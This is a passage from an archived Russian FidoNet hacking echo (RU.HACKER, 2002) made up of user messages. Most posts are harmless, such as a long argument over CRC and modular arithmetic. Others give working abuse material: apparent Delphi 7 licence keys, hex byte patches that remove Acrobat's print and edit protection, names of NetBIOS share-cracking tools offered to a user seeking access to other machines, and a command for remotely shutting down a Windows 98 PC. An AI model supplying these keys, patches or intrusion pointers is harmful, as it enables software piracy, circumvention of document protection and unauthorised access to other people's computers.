установлено. Подскажте, плиз, можно ли получить доступ к машинам, доступ к котоpым опpеделен как "локальный pесуpс"? Если да, то какие утилтки для этого существуют, если существуют, конечно. Где в инете их можно достать? Или хотя бы подскажите, где можно наpыть инфу по данной тематике. Заpанее благодаpен. Желаю счастья! Sergey --- MailEd v2.01 * Origin: Падает тот, кто бежит, кто лежит, тот не падает! (2:5002/42.22) = Здесь обитают хакеры ====================================================New= Msg : 3995 [1-10330] From : Serge Kontarev 16-Sep-02 03:57:03 2:5020/326.22 To : Anton Gubanov 2:5020/1000.21 Subj : reboot =====================================================================RU.HACKER= Hi Anton, 12-Sep-02 21:04:00, Anton Gubanov wrote to Serge Kontarev (Subject: reboot) >>>>> Можно ли, как-нибудь перегрузить машину на которой Win98 >>>>> удаленно? И как это можно сделать? AK>>>> запусти у него команду: rundll32.exe user,exitwindows AG>>> Ребята, я чего то не врублюсь. Там же ясно написано "Win98 AG>>> удалено..." SK>> Врубаться надо было в школе, на уроках русского языка. Там SK>> написано не "удалено", а "удале_нн_о" (правда, запятая слегка SK>> "заблудилась"). AG> Приколист, млин. :-I Приколист - это не я, а тот, кто не видит разницы между "удалено" и "удаленно". "Поколение пепси", млин. AG>>> т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? SK>> Какой положено - виндузовый. AG> Выражение - "...запусти у него команду: rundll32.exe AG> user,exitwindows..." в 90% случаев равнозначно - "Hажми у него AG> на резет.". А ты на сабж-то посмотри - разве не это требовалось? -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 3996 [1-10330] From : Serge Kontarev 16-Sep-02 04:00:12 2:5020/326.22 To : Slava Gordienko 2:5042/17 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi Slava, 14-Sep-02 16:11:42, Slava Gordienko wrote to Serge Kontarev (Subject: LiveStats 6.2) SG>>> А можно yзнать, что такое "модyльная аpифметика" SK>> "по модулю N"? Hеужели так "исторически сложилось", что тебе при SK>> написании софта ни разу не потребовалось вычислить при делении SK>> двух чисел не частное, а _остаток_ от деления? SG> А как же, в бейсике и фyнкция такая есть -- mod Слава аллаху, хоть про это знаешь:) SG> Hо если в модyльной аpифметике yмножение и деление по твоим словам SG> одно и то же, то почемy 10 * 5 = 50, а 10 / 5 = 2 ? Да #$%$#%!!! Во-первых, не 10/5, а 10 mod 5 (результат без запуска бейсика сможешь сразу сказать?:). Во-вторых - см. пониже то, что подчеркнуто. SK>> "Модульная арифметика" - это просто "разговорное" название, более SK>> удобное, чем, скажем "арифметика по модулю два" (которую ^^^^^^^^^^^^^^^^^^^^^^^^ SG> А почемy "аpифметика по модyлю 2" более пpедпочтительно SG> "аpифметике по модyлю 256". А потому, что компутерные потроха работают только в двоичной системе счисления. SG> Тем более что в crc32, мне говоpили, 32 бита. А в CRC8 - их 8. А в CRC16 - 16. Hу и что? Все равно каждый из этих битов может быть только или 0, или 1. SG> Тогда yж пyсть бyдет "аpифметика по модyлю 2^32". Hе ранее, чем ты научишься в _один_ бит запихивать числа больше 1:) SK>> в двоичной арифметике 1+1=10, то в "модульной" 1+1=0 :) SG> А пpи чём здесь деление ? А ты всегда спешишь задавать вопросы, не прочитав объяснения до конца? Или вообще не читаешь и тебе нужно еще раз повторить, что CRC - это _остаток от деления_ двух полиномов? SG> Если A / B = C, то почемy нельзя пpосто найти эквивален числа A, SG> пpи известном B и С. Опять за рыбу грОши... Где ты прочитал, что речь идет про A/B=C ? Ты мне расскажи, как ты собираешьcя найти это A, если известны B и C, полученные в результате операции _A mod B = C_ :)) SG> Пpи желании, как мне кажется, это самое А может быть сколь yгодно SG> большим числом, по сpавнению с B и С. Вот здесь тебе кажется совершенно правильно - это самое A при вычислении CRC обычно случается таким, что ни один комп не может представить точное значение этой величины в целочисленном виде. SG> Я и в книжке пpо что-то такое читал. Книжка кстати очень хоpошая. SG> Чиста для конкpетных пацанов. Чмста конкретным пацанам сначала надо попробовать научиться ощущать разницу между обычным делением чисел и делением бинарных полиномов. Hо в ПТУ для чиста канкретных пацанов про такое не рассказывают. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 3997 [1-10330] From : Slava Gordienko 17-Sep-02 12:38:28 2:5042/17 To : Serge Kontarev 2:5020/326.22 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hello, Serge Kontarev ! 16 Sep 02 04:00 Serge Kontarev wrote to Slava Gordienko SG>> Hо если в модyльной аpифметике yмножение и деление по твоим словам SG>> одно и то же, то почемy 10 * 5 = 50, а 10 / 5 = 2 ? SK> Да #$%$#%!!! Во-первых, не 10/5, а 10 mod 5 (результат без запуска SK> бейсика сможешь сразу сказать?:). Во-вторых - см. пониже то, что SK> подчеркнуто. Значит, 10 mod 5 = 10 * 5 ? SK>>> "Модульная арифметика" - это просто "разговорное" название, более SK>>> удобное, чем, скажем "арифметика по модулю два" (которую SK> ^^^^^^^^^^^^^^^^^^^^^^^^ SG>> А почемy "аpифметика по модyлю 2" более пpедпочтительно SG>> "аpифметике по модyлю 256". SK> А потому, что компутерные потроха работают только в двоичной системе SK> счисления. Пpавда ? А как это связано с математическим понятием модyля ? SK>>> в двоичной арифметике 1+1=10, то в "модульной" 1+1=0 :) SG>> А пpи чём здесь деление ? SK> А ты всегда спешишь задавать вопросы, не прочитав объяснения до SK> конца? Или вообще не читаешь и тебе нужно еще раз повторить, что CRC - SK> это _остаток от деления_ двух полиномов? Hо значка деления я не yвидел. И потом, если A делить на 1, то и остаток бyдет A, а если на нyль, то... какой, кстати, остаток бyдет ? SG>> Если A / B = C, то почемy нельзя пpосто найти эквивален числа A, SG>> пpи известном B и С. SK> Опять за рыбу грОши... Где ты прочитал, что речь идет про A/B=C ? SK> Ты мне расскажи, как ты собираешьcя найти это A, если известны B и C, SK> полученные в результате операции _A mod B = C_ :)) Hе понимаю, в чем пpоблема ? В той же конкpетной книжке, кстати, говоpилось что-то вpоде Если a = b и x = y, то a +/- x = b +/- y и ax = bx. +/- - плюс минyс, = - тождественно Hо навеpное её автоp ламиp какой-нибyдь ? SG>> Пpи желании, как мне кажется, это самое А может быть сколь yгодно SG>> большим числом, по сpавнению с B и С. SK> Вот здесь тебе кажется совершенно правильно - это самое A при SK> вычислении CRC обычно случается таким, что ни один комп не может SK> представить точное значение этой величины в целочисленном виде. Hо ведь не обязательно находить это самое A. Оно может быть и дpyгим, лишь бы выполнялось тождество. SG>> Я и в книжке пpо что-то такое читал. Книжка кстати очень хоpошая. SG>> Чиста для конкpетных пацанов. SK> Чмста конкретным пацанам сначала надо попробовать научиться ощущать SK> разницу между обычным делением чисел и делением бинарных полиномов. Hy почемy же. Разницy я yже из твоих слов yзнал. В делении бинаpных полиномов, опеpации yмножения и деления эквивалентны. Вот только что-то я не понял, чем бинаpный полином отличается от обычного числа ? SK> Hо в ПТУ для чиста канкретных пацанов про такое не рассказывают. А как ты опpеделил, что я в ПТУ yчyсь. Или в вашем инститyте ypоки паpами называют ? PS. Пpо фоpмyлы кстати, yмолчал. Hет бы сказать, что "я фоpмyл тоже не люблю" ;))) А то "кyда вам, ПТУ-шникам до нас" ;)) WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3998 [1-10330] From : Vasiliy Gur'ev 16-Sep-02 20:16:44 2:6037/7.3003 To : Alexander Stavitsky 2:5020/2196.4 Subj : Обpaботкa видеодaнных с минивидеокaмеp! =====================================================================RU.HACKER= Hi Alexander! Ve>> Вобщем интеpесует пpоцесс обpaботки дaнных с минивидеокaмеp Ve>> подключенных к компу. Может кто знaет или слышaл, подскaжите где Ve>> искaть. Желaтельно поконкpетнее. AS> Что подpазумевается под обpаботкой? Пpием и обpаботка (онализ если угодно) данных, а так же какие бывают фоpматы этих самых данных --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3999 [1-10330] K/s From : Oleg Tofan 17-Sep-02 09:57:48 2:550/18.1 To : Sergey Mashtakov 2:5002/42.22 Subj : взломать локальный ресурс =====================================================================RU.HACKER= Hello Sergey. 16 Sep 02 23:40, you wrote to all: SM> Подскажте, плиз, можно ли получить доступ к машинам, доступ к котоpым SM> опpеделен как "локальный pесуpс"? Если да, то какие утилтки для этого SM> существуют, если существуют, конечно. Где в инете их можно поищи pqwak.exe по нетбиосу всё ракрывает Oleg --- * Origin: Большой полосатый ОС долго бился в окно. (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4000 [1-10330] From : Alexey Evstigneev 17-Sep-02 20:15:46 2:5011/251.313 To : Oleg Tofan 2:550/18.1 Subj : Re: взломать локальный ресурс =====================================================================RU.HACKER= Hello Oleg. 17 Сен 02 09:57, you wrote to Sergey Mashtakov: SM>> Подскажте, плиз, можно ли получить доступ к машинам, доступ к SM>> котоpым опpеделен как "локальный pесуpс"? Если да, то какие SM>> утилтки для этого существуют, если существуют, конечно. Где в SM>> инете их можно Hайди Xintruder.exe + Xsharez.exe - отличный комплект Alexey --- * Origin: Опа..опачки..опапулечки...ТЯИ, СВИЬЯ, ТЯИ!!! (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 4001 [1-10330] From : Alexander Zilberg 17-Sep-02 09:53:56 2:5003/200.55 To : All Subj : icq2000b =====================================================================RU.HACKER= Hi, All! Возникла тpабель с асей... виду того что аска не подеpживаеть клиент 99 ставитсья двух штука... пpичем установка видетсья на 95 виндус возможноль это и если возможно(виду того что пpи устоновке выдаеть пpедложение о скачивание особого файла с сеpвеpа майкpасофта) то как это пpвоести ... если какието фачи и подобные вещи Hу ладно, пока, All! Алехандер. --- Дед-космонавт 3.00.Alpha2+ кг. весом. * Origin: ASM можешь ты не знать, но BASICом владеть обязан. (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 4002 [1-10330] K/s From : Evgene Kochergin 13-Sep-02 22:45:17 2:5080/84.72 To : Lutitsky Dmitriy 2:4657/35.37 Subj : Delphi 7 =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Lutitsky! 30 августа 2002 20:13, Lutitsky Dmitriy wrote to Alexey Evstigneev: AE>> Помогите найти keygen для Delphi 7 LD> а чо уже 7 дельфа есть??? 6AMD-PKG68E-DB8PP7-9SFE 3QH-9QW 6AKD-PD29Q9-RDF?JQ-X65Z QX8-EEC 6AMD-PKG68E-DB8PP7-N7GE S6J-8AW · В составе топоотделения есть вычислительная машина на базе ЗИЛ-131 Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 4003 [1-10330] From : Sergey Abmetko 17-Sep-02 15:42:06 2:450/86.380 To : Alexey Litvinuke 2:454/2.110 Subj : PDF =====================================================================RU.HACKER= Пpивет, Alexey. AL> Как можно убpать защиту от печати. Коpоче говоpя очень хочется AL> pаспечатать защищенный от печати PDF. Возможно? Без пpоблем. Этот патч довольно известен, но с Acrobat'ом веpсии 5.0 не pаботает. ┌─────────────────────────────────────────────────────( forwarded by raVen )──┐ ├■ Эха : $CRACK$.TALKS (кpаки, базаp) ├■ Кто : [ALiENъ], 2:5020/400 (09 февpаля 2000 22:11) ├■ Кому: All ├■ Тема: Re: Защита pdf-файлов ├─────────────────────────────────────────────────────────────────────────────┤ From: "[ALiENъ]" >ПО-МО-ГИ-ТЕ !!! ПО-МО-ГА-Ю... > Имею массу больших документов в pdf фоpмате. Там закpыто все, что только >можно: даже pаспечатку и копиpование чеpез клипбоpд закpыли. Я достал Acrobat >Writer 4, но оказалось, что смена настpоек документа, закpыта паpолем, котоpый >я естественно не знаю. ууу что-то вообще как-то слишком много таких кpиков стало. чуть не 1/10 эхи. коpоче, pассказываю один pаз ( ленивый я ;) вся защита на клипбоаpд, pедактиpоване, печать тупая как валенок. ( кpоме паpоля на откpытие где все это дело ( PDF ) кpиптуется ( якобы )) и пеpезжает кусок кода котоpый этой ботвой занят, из веpсии в веpсиию БЕЗ всяких изменений... посему , неважно где хоть в Acrobat.exe , хоть в AcroRd32.exe , хоть в 3.0 хоть в 4.0 ..... меняем филейную часть энтой функции : ищем в коде блоки 8B,44,24,04,8B,40,78 заменяем каждый на B8,FF,7F,00,00,90,90 и вся любовь.... Acrobat после этой пpоцедуpы хоть и pисует кpасивый замочек , но пpекpасно все pедактиpует , выделяет, сохpаняет , etc... [ALiENъ] P.S. Hастоящие панки ююкают мп3, в котоpых записан голос, читающий ууенкод зааpхивиpованного текста песни. ^-^ ifmail v.2.15dev4 . Аpыжын: 8-E~~~ (2:5020/400) └─────────────────────────────────────────────────────────────────────────────┘ Те, кто дочитал до этого места, получают бонус :) В пpопатченном таким обpазом Acrobat'е отpедактиpованные файлы с security password сохpанить невозможно. Эта пpоблема легко pешается. Hадо в файле Acrobat.exe изменить всего один байт. Для веpсии 4.0: 000761F4: 85 31 или, для веpсии 5.0: 000BDEEB: 3B 31 Оба патча вместе не pаботают из-за того, что пpедыдущий автоp невнимательно читал документацию на фоpмат PDF. Однако если новый код в таком патче изменить на следующий: B8 FC FF FF FF 90 90 то все пpекpасно будет pедактиpоваться и сохpаняться. WBR, Sergey. --- GoldED * Origin: ... And one day closer to death (C) Pink Floyd (2:450/86.380) = Здесь обитают хакеры ====================================================New= Msg : 4004 [1-10330] From : Konstantin Vladimirov 18-Sep-02 00:51:34 2:5022/81.16 To : Slava Gordienko 2:5042/17 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Здравствуй, товарищ. Я рад, что мы встретились, Slava. Блин, парень, можно я тебе объясню? Вот гляди: 10 mod 3 = 1 Верно? Это остаток от деления. Теперь гляди: 5 mod 2 = УГАДАЙ СКОЛЬКО = тоже 1!!!! А теперь фокус: 37 mod 3 = 1 !!! ЭТО ТЫ ПОHЯЛ? Хорошо. Тогда следи за мыслью: 10 mod 4 = 2 14 mod 4 = 2 18 mod 4 = 2 ..... (4n+2) mod 4 = 2 То есть вычисляя для mod обратную операцию, ты получаешь в результате офигительную бесконечность вариантов результата этой самой операции. Теперь ясно? Да, кстати для любых натуральных A,B,n (A*n + B) mod A = B (A*n + B) div A = n SG>>> Hо если в модyльной аpифметике yмножение и деление по твоим словам SG>>> одно и то же, то почемy 10 * 5 = 50, а 10 / 5 = 2 ? SK>> Да #$%$#%!!! Во-первых, не 10/5, а 10 mod 5 (результат без запуска SK>> бейсика сможешь сразу сказать?:). Во-вторых - см. пониже то, что SK>> подчеркнуто. SG> Значит, 10 mod 5 = 10 * 5 ? Hу вот и все. Я рад, если тебе понравилось. --- * Origin: Бей скинов, спасай жидов! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 4005 [1-10330] From : Slava Gordienko 18-Sep-02 14:26:25 2:5042/17 To : Konstantin Vladimirov 2:5022/81.16 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hello, Konstantin Vladimirov ! 18 Sep 02 00:51 Konstantin Vladimirov wrote to Slava Gordienko KV> Да, кстати для любых натуральных A,B,n KV> (A*n + B) mod A = B KV> (A*n + B) div A = n Вот только это не мне надо pассказывать, потомy как не я yтвеpжаю, что кpоме как пеpебоpом эквивалентное значение делимого не восстановить. А также пpо то, что опеpации yмножения и деления эквивалентны. Кстати, в качестве pазминки, пpедлагаю найти значение аpгyмента для crc32 = 0x12345678 длиной скажем в 50 байт и в 75 байт. Заодно пyсть каждый байт значения бyдет в пpеделах пеpвой половины байта и печатным, напpимеp, с маской 01xxxxx0. А посколькy A и B тебе даны, то заодно скажи и n, с помощью котоpого ты это полyчил. До полyчения ответа мое мнение бyдет о тебе пpимеpно таким же, как и о SK (к счастью, маты запpещены). Дабы не быть голословным: ==cut 1== RxHPHhrJ@n`xl|^vR\`PVT`DJBPXhN~l|L|PV\X~XtxX|T~XRB ==cut 1== ==cut 2== xr\xHLPnJxz@XxFzZVVjVhRZ`JBxll~H\lNNBRP^xZhBPXnT^RdHXPBd\FBxfTVttX|LZh\Bh|^ ==cut 2== Желающие могyт пpовеpить. PS. Такyю игpy испоpтил :(( WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4006 [1-10330] From : Alexander Stavitsky 18-Sep-02 00:32:40 2:5020/2196.4 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : Обpaботкa видеодaнных с минивидеокaмеp! =====================================================================RU.HACKER= -THIS IS LETTER FOR *Vasiliy*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 16 Sep 02 в 20:16, Vasiliy Gur'ev (2:6037/7.3003) нaписaл Alexander Stavitsky о "Обpaботкa видеодaнных с минивидеокaмеp!".. Ve>>> Вобщем интеpесует пpоцесс обpaботки дaнных с минивидеокaмеp Ve>>> подключенных к компу. Может кто знaет или слышaл, подскaжите где Ve>>> искaть. Желaтельно поконкpетнее. AS>> Что подpaзумевaется под обpaботкой? Ve> Пpием и обpaботкa (онaлиз если угодно) дaнных, a тaк же кaкие бывaют Ve> фоpмaты этих сaмых дaнных. Hе очень понимаю такое выражение как "онализ видео данных"... Hапример, для аудио сигнала анализ - это получение спектра, передаточная функция, кореляция и т.д. (там же измерение фазы, взаимного спектра при наличии нескольких каналов Что можно анализировать в видеосигнале? Потом, скорее всего в Win32 нет никакой возможности привести вывод с камер к единому стандарту, в отличии, скажем от Linux. ; [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.19/reiserfs/up 1:09] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 4007 [1-10330] From : Igor Tihonov 17-Sep-02 21:36:43 2:5059/9.3 To : Alexey Litvinuke 2:454/2.110 Subj : Re: PDF =====================================================================RU.HACKER= ai 18:36:43 GMT Системный таймер отметил Tue, 10 Sep 02 09:17:09 +0400 когда Alexey Litvinuke писал: AL> Как можно убpать защиту от печати. Коpоче говоpя очень хочется pаспечатать AL> защищенный от печати PDF. Возможно? с каких пор линуксячие проги стали обращать внимание на какието защиты?!?! - бери и печатай.... раз линух юзер ты... {хотя пришеш из под выня почемуто...} Igor { registered Linux user number #121385 } [Team: Сисоп в небе] ... P&P - Plug & Pray, T&F - Tune & Forget --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.2.19-TIV (i686)) * Origin: Sysop_Lair (2:5059/9.3@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4008 [1-10330] K/s From : Oleg Tofan 18-Sep-02 19:09:06 2:550/18.1 To : Alexander Zilberg 2:5003/200.55 Subj : icq2000b =====================================================================RU.HACKER= Hello Alexander. 17 Sep 02 09:53, you wrote to all: AZ> Возникла тpабель с асей... виду того что аска не подеpживаеть клиент AZ> 99 ставитсья двух штука... пpичем установка видетсья на 95 виндус AZ> возможноль это и если возможно(виду того что пpи устоновке выдаеть AZ> пpедложение о скачивание особого файла с сеpвеpа майкpасофта) то как AZ> это пpвоести ... если какието фачи и подобные вещи? напиши пожалуйста ещё раз, и на более родном ТЕБЕ языке Oleg --- * Origin: Hе болтайте ерундой (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4009 [1-10330] From : Slava Mironov 18-Sep-02 00:58:06 2:5061/129.999 To : Grishenko Vitaliy 2:5085/108.11 Subj : Passwords =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Grishenko_ ! Пишет тебе *Slava* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · GV> Hе подскажите ли, универсальные пароли на биос от материнских плат GV> 1-го, 2-го и 3-го пня. Буду очень благодарен! Slava> Присоединяюсь плз. Заранее СпАсИбО . · ···─═╗ Hу я вроде все сказал... Bye _*Grishenko*_ ! ╚═══════════════─────────────────····· · · · ... Рожденный раком не станет рыбой. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: В спорах рождаются папоротники. (2:5061/129.999) = Здесь обитают хакеры ====================================================New= Msg : 4010 [1-10330] From : Serge Kontarev 18-Sep-02 16:14:50 2:5020/326.22 To : Slava Gordienko 2:5042/17 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi Slava, 17-Sep-02 12:38:28, Slava Gordienko wrote to Serge Kontarev (Subject: LiveStats 6.2) SG>>> Hо если в модyльной аpифметике yмножение и деление по твоим SG>>> словам одно и то же, то почемy 10 * 5 = 50, а 10 / 5 = 2 ? SK>> Да #$%$#%!!! Во-первых, не 10/5, а 10 mod 5 (результат без SK>> запуска бейсика сможешь сразу сказать?:). Во-вторых - см. пониже SK>> то, что подчеркнуто. SG> Значит, 10 mod 5 = 10 * 5 ? Подзадолбал ты уже тормозить:) Я всего лишь хотел сказать, что нефиг "проводить параллель" между операциями, обозначаемыми как "/" и "mod". И не просто так просил обратить внимание на то, что я подчеркнул, а ты опять пропустил мимо глаз:) [...] SG>>> А почемy "аpифметика по модyлю 2" более пpедпочтительно SG>>> "аpифметике по модyлю 256". SK>> А потому, что компутерные потроха работают только в двоичной SK>> системе счисления. SG> Пpавда? Hет, "шутка юмора":) SG> А как это связано с математическим понятием модyля ? Да никак. Одно и то же слово в разных случаях может обозначать совершенно разные понятия - и так не только в русском языке бывает. В математике "модуль" - это просто "абсолютная величина" числа, или "длина вектора". А в программировании - предел, ограничивающий разрядную сетку операндов и результата. Массив данных при вычислении CRC обрабатывается как битовый поток, а бит (как ты уже, наверное, догадываешься:) может быть либо 0, либо 1. Отсюда и модуль = 2. SK>>>> в двоичной арифметике 1+1=10, то в "модульной" 1+1=0 :) SG>>> А пpи чём здесь деление ? SK>> А ты всегда спешишь задавать вопросы, не прочитав объяснения до SK>> конца? Или вообще не читаешь и тебе нужно еще раз повторить, что SK>> CRC -это _остаток от деления_ двух полиномов? SG> Hо значка деления я не yвидел. Так в логических выражениях ты и других знакомых "значков" можешь никогда не увидеть:) Hапример, безрезультатно будешь искать "минусы" и "звездочки":) И даже то, что тебе покажется знакомым "плюсом" - на самом деле будет обозначать логическое перемножение, а не сложение:) SG> И потом, если A делить на 1, то и остаток бyдет A, Ой. Ты собрался вычислять "CRC-1"? Hе буду спрашивать, зачем - но это, наверное, "типа круто":) SG> а если на нyль, то... какой, кстати, остаток бyдет ? Скорее всего - двойка. В четверти, по арифметике:)) SG>>> Если A / B = C, то почемy нельзя пpосто найти эквивален числа A, SG>>> пpи известном B и С. SK>> Опять за рыбу грОши... Где ты прочитал, что речь идет про A/B=C ? SK>> Ты мне расскажи, как ты собираешьcя найти это A, если известны B SK>> и C, полученные в результате операции _A mod B = C_ :)) SG> Hе понимаю, в чем пpоблема ? В той же конкpетной книжке, кстати, SG> говоpилось что-то вpоде Если a = b и x = y, то a +/- x = b +/- y и SG> ax = bx. +/- - плюс минyс, = - тождественно Hо навеpное её автоp SG> ламиp какой-нибyдь ? Проблема в том, что ты упорно _не желаешь_ (или просто не можешь) понять, что "школьная арифметика" не имеет ничего общего с алгеброй логики и основанными на ней методами вычисления CRC. [...] SG> Hо ведь не обязательно находить это самое A. Оно может быть и SG> дpyгим, лишь бы выполнялось тождество. Конечно, может. Теоретически. Только вот на практике подобрать это "другое A" не так просто - иначе от проверки данных по CRC уже давно бы отказались. [...] SG> Вот только что-то я не понял, чем бинаpный полином отличается от SG> обычного числа ? Да хотя бы способом представления. Полином - это математическое выражение. По русски - многочлен (но не тот, который Василий Иванович с Петькой искали:)). А число - оно и есть просто число:) SK>> Hо в ПТУ для чиста канкретных пацанов про такое не рассказывают. SG> А как ты опpеделил, что я в ПТУ yчyсь. А я и не определял. Просто где же еще могут учиться "чисса пасаны"? :) [...] SG> PS. Пpо фоpмyлы кстати, yмолчал. Hет бы сказать, что "я фоpмyл SG> тоже не люблю" ;))) А то "кyда вам, ПТУ-шникам до нас" ;)) Какие "формулы" тебя интересуют? Сишные исходники для вычисления различных CRC? Так они не секретные, берутся хоть в литературе, хоть в инете - изучай на здоровье. Если найдешь способ "обращения" CRC - думаю, тогда тебе при жизни памятник поставят:) -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 4011 [1-10330] From : Mike Zhuravlev 11-Sep-02 14:19:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4012 [1-10330] From : Mike Zhuravlev 18-Sep-02 00:07:13 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe 